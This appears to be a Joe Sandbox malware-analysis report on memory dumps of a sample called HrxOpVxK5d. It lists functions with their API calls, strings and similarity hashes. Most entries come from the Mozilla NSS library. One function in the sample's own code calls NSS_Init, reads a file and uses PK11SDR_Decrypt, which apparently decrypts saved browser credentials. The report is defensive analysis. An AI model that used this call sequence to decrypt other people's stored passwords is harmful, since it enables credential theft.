dynamic OID data, xrefs: 6CFE068A
4m, xrefs: 6CFE071B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
String ID: 4m$NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags
API String ID: 514890423-3256803199
Opcode ID: d5ae415e3bb99774e0782a58c34c785981c43b3bc6f9f05b38f25ae6e6428e6c
Instruction ID: 2725663f7459b9183f71a97b14be3412f5c21eda50ebe48191d79fd055813c57
Opcode Fuzzy Hash: d5ae415e3bb99774e0782a58c34c785981c43b3bc6f9f05b38f25ae6e6428e6c
Instruction Fuzzy Hash: 1D5116B1D012826FFB118B769C04B673AB4AB8A75CF1D0135E818D7781FBB1D544DBA1

Function 6CFC2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CFC2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CFC2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CFC2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CFC2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CF94F1C,?,-00000001,00000000,?), ref: 6CFC2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CF94F1C,?,-00000001,00000000), ref: 6CFC2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFC2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFC2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFC2EF8
PR_Unlock.NSS3(?), ref: 6CFC2F62
TlsGetValue.KERNEL32 ref: 6CFC2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CFC2F9E
PR_Unlock.NSS3(?), ref: 6CFC2FCA
TlsGetValue.KERNEL32 ref: 6CFC301A
EnterCriticalSection.KERNEL32(?), ref: 6CFC302E
PR_Unlock.NSS3(?), ref: 6CFC3066
PR_SetError.NSS3(00000000,00000000), ref: 6CFC3085
PR_Unlock.NSS3(?), ref: 6CFC30EC
TlsGetValue.KERNEL32 ref: 6CFC310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CFC3124
PR_Unlock.NSS3(?), ref: 6CFC314C

Part of subcall function 6CFA9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CFD379E,?,6CFA9568,00000000,?,6CFD379E,?,00000001,?), ref: 6CFA918D
Part of subcall function 6CFA9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CFD379E,?,6CFA9568,00000000,?,6CFD379E,?,00000001,?), ref: 6CFA91A0

Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707AD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707CD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707D6
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF0204A), ref: 6CF707E4
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,6CF0204A), ref: 6CF70864
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF70880
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,6CF0204A), ref: 6CF708CB
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708D7
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708FB

PR_SetError.NSS3(00000000,00000000), ref: 6CFC316D

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 1b0dd91fb70a8d9ca59d931bbba06fc814b02565a195b3fb939dd6594cbd0032
Instruction ID: 29865380a74803b1bd1acca1a839db7f9f8822962d932c0fb777206ad173d562
Opcode Fuzzy Hash: 1b0dd91fb70a8d9ca59d931bbba06fc814b02565a195b3fb939dd6594cbd0032
Instruction Fuzzy Hash: 6BF18BB1E00609AFEF00DF64D884B9EBBB4FF09318F155169EC04A7611EB31E995CB92

Function 6CFB6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CFB6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB6DC3

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CFB6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CFB6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CFB6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CFB6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CFB6EB9

Strings

(CK_INVALID_HANDLE), xrefs: 6CFB6DBC
C_Digest, xrefs: 6CFB6D81
pData = 0x%p, xrefs: 6CFB6DF5
pDigest = 0x%p, xrefs: 6CFB6E27
pulDigestLen = 0x%p, xrefs: 6CFB6E42
hSession = 0x%x, xrefs: 6CFB6D9E, 6CFB6DAE
*pulDigestLen = 0x%x, xrefs: 6CFB6EB4
nm, xrefs: 6CFB6E61, 6CFB6E95
ulDataLen = %d, xrefs: 6CFB6E0E

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nm
API String ID: 1003633598-2421259712
Opcode ID: 54696785b308a4160695039fb9e05501e0800e464e6f5a23706f4f2737ff7122
Instruction ID: 970cd475ea4b34a800647a62314300982ca6408f23015844750837ddbf9b5253
Opcode Fuzzy Hash: 54696785b308a4160695039fb9e05501e0800e464e6f5a23706f4f2737ff7122
Instruction Fuzzy Hash: F741D035505009AFEB18DF66DD48F9E3BB1EB86B18F094064F90CEB252DB31D914CBA2

Function 6CFB8500 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6CFB8526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB8554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB8563

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB8579
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6CFB859A
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6CFB85B3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CFB85CC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6CFB85E7
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6CFB8659

Strings

(CK_INVALID_HANDLE), xrefs: 6CFB855C
pulPartLen = 0x%p, xrefs: 6CFB85E2
*pulPartLen = 0x%x, xrefs: 6CFB8654
pEncryptedPart = 0x%p, xrefs: 6CFB8595
hSession = 0x%x, xrefs: 6CFB853E, 6CFB854E
C_DecryptDigestUpdate, xrefs: 6CFB8521
nm, xrefs: 6CFB8601, 6CFB8635
ulEncryptedPartLen = %d, xrefs: 6CFB85AE
pPart = 0x%p, xrefs: 6CFB85C7

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate$nm
API String ID: 1003633598-1140952291
Opcode ID: ff1de9fea6c58bda002e26d1b37589c083a6d8134052a0e1c1ed858e3530f9ef
Instruction ID: 64fa9cf805e5a203ff4a67ca930e7032c9ec3c482ed9c5981ad448dadce42769
Opcode Fuzzy Hash: ff1de9fea6c58bda002e26d1b37589c083a6d8134052a0e1c1ed858e3530f9ef
Instruction Fuzzy Hash: FA412635405006AFEB14DF62DE48F5E3BB1EB8271DF094066F908AB253DB30CA54CBA1

Function 6CFC6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CFC6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CFC6943
Part of subcall function 6CFC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CFC6957
Part of subcall function 6CFC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CFC6972
Part of subcall function 6CFC6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CFC6983
Part of subcall function 6CFC6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CFC69AA
Part of subcall function 6CFC6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CFC69BE
Part of subcall function 6CFC6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CFC69D2
Part of subcall function 6CFC6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CFC69DF
Part of subcall function 6CFC6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CFC6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFC6D8C
free.MOZGLUE(00000000), ref: 6CFC6DC5
free.MOZGLUE(?), ref: 6CFC6DD6
free.MOZGLUE(?), ref: 6CFC6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFC6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFC6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFC6E72
free.MOZGLUE(?), ref: 6CFC6EA7
free.MOZGLUE(?), ref: 6CFC6EC4
free.MOZGLUE(?), ref: 6CFC6ED5
free.MOZGLUE(00000000), ref: 6CFC6EE3
free.MOZGLUE(?), ref: 6CFC6EF4
free.MOZGLUE(?), ref: 6CFC6F08
free.MOZGLUE(00000000), ref: 6CFC6F35
free.MOZGLUE(?), ref: 6CFC6F44
free.MOZGLUE(?), ref: 6CFC6F5B
free.MOZGLUE(00000000), ref: 6CFC6F65

Part of subcall function 6CFC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CFC781D,00000000,6CFBBE2C,?,6CFC6B1D,?,?,?,?,00000000,00000000,6CFC781D), ref: 6CFC6C40
Part of subcall function 6CFC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CFC781D,?,6CFBBE2C,?), ref: 6CFC6C58
Part of subcall function 6CFC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CFC781D), ref: 6CFC6C6F
Part of subcall function 6CFC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CFC6C84
Part of subcall function 6CFC6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CFC6C96
Part of subcall function 6CFC6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CFC6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFC6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFC6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CFC6FF4

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 25df95329fdc68a810b8317dac35f4252765141e1826d4cdb4d97b5fb4eaadc4
Instruction ID: 777337a52cb4da7733ce890294f5991ddb7192d46a3bafb865be31a49bb96228
Opcode Fuzzy Hash: 25df95329fdc68a810b8317dac35f4252765141e1826d4cdb4d97b5fb4eaadc4
Instruction Fuzzy Hash: 82B14FB5F0921A9BDF00CBA9D844BEFBBB4AF09308F140026F815E7641E731E915CB66

Function 6CFC4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CFC4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CFC4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CFC4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4DB7

Part of subcall function 6D02DD70: TlsGetValue.KERNEL32 ref: 6D02DD8C
Part of subcall function 6D02DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D02DDB4

Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707AD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707CD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707D6
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF0204A), ref: 6CF707E4
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,6CF0204A), ref: 6CF70864
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF70880
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,6CF0204A), ref: 6CF708CB
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708D7
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708FB

TlsGetValue.KERNEL32 ref: 6CFC4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CFC4DEC
PR_Unlock.NSS3(?), ref: 6CFC4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CFC4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CFC4E71
free.MOZGLUE(00000000), ref: 6CFC4E7A
PR_Unlock.NSS3(?), ref: 6CFC4EA2
TlsGetValue.KERNEL32 ref: 6CFC4EC1
EnterCriticalSection.KERNEL32(?), ref: 6CFC4ED6
PR_Unlock.NSS3(?), ref: 6CFC4F01
free.MOZGLUE(00000000), ref: 6CFC4F2A

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 9e78299de2f4a61d234d3ac3d064cdd53c9fbe80122cf0b5b6b9d77bf0965a13
Instruction ID: 8051b4a2917958438e59747f1526c71762e15648c8899be3f994ca11debd45b7
Opcode Fuzzy Hash: 9e78299de2f4a61d234d3ac3d064cdd53c9fbe80122cf0b5b6b9d77bf0965a13
Instruction Fuzzy Hash: 24B1F175B002069FEB00DF68D844BAB7BB4BF49318F054129ED1597B10EB31E961CBE2

Function 0040CA90 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040CAA5

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02D45560,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
StrStrA.SHLWAPI(?,02D45668,00420B56), ref: 0040CBF7
StrStrA.SHLWAPI(00000000,02D455A8), ref: 0040CC1E
StrStrA.SHLWAPI(?,02D45FD0,00000000,?,00421550,00000000,?,00000000,00000000,?,02D3E048,00000000,?,0042154C,00000000,?), ref: 0040CDA2
StrStrA.SHLWAPI(00000000,02D45CD0), ref: 0040CDB9

Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D3E008), ref: 0040C971
Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
Part of subcall function 0040C920: PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
Part of subcall function 0040C920: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
Part of subcall function 0040C920: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
Part of subcall function 0040C920: PK11_FreeSlot.NSS3(?), ref: 0040CA61

StrStrA.SHLWAPI(?,02D45CD0,00000000,?,00421554,00000000,?,00000000,02D3E008), ref: 0040CE5A
StrStrA.SHLWAPI(00000000,02D3E1D8), ref: 0040CE71

Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

lstrlenA.KERNEL32(00000000), ref: 0040CF44
CloseHandle.KERNEL32(00000000), ref: 0040CF9C
NSS_Shutdown.NSS3 ref: 0040CFAA

Strings

, xrefs: 0040CAC6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
String ID:
API String ID: 3555573487-3916222277
Opcode ID: 3f26f2d45a8a9cd2039c60343b11300136de6eb3dd7c913aed960b3c51f0c797
Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
Opcode Fuzzy Hash: 3f26f2d45a8a9cd2039c60343b11300136de6eb3dd7c913aed960b3c51f0c797
Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69

Function 6CF8C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CF8C4D5

Part of subcall function 6CFDBE30: SECOID_FindOID_Util.NSS3(6CF9311B,00000000,?,6CF9311B,?), ref: 6CFDBE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CF8C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CF8C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CF8C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6CF8C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6CF8C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CF8C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CF8C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CF8C751
PL_FinishArenaPool.NSS3(?), ref: 6CF8C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CF8C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CF8C7A9

Strings

security, xrefs: 6CF8C63F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: 0bb9f8a4bc5bdf59174e03cda6bf7f8c12866fcaa143e811b97d84c89f436765
Instruction ID: 4b4942d02614306780431a3d2e7784bfcce9f8a460e71eb6e3d8f757a8f0b0fc
Opcode Fuzzy Hash: 0bb9f8a4bc5bdf59174e03cda6bf7f8c12866fcaa143e811b97d84c89f436765
Instruction Fuzzy Hash: 7181D871C02109ABEF00EA65DC85BEF7774EF0531CF244325ED05ABA91E761D949CBA1

Function 6CFF4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6CFF3803,?,6CFF3817,00000000), ref: 6CFF450E

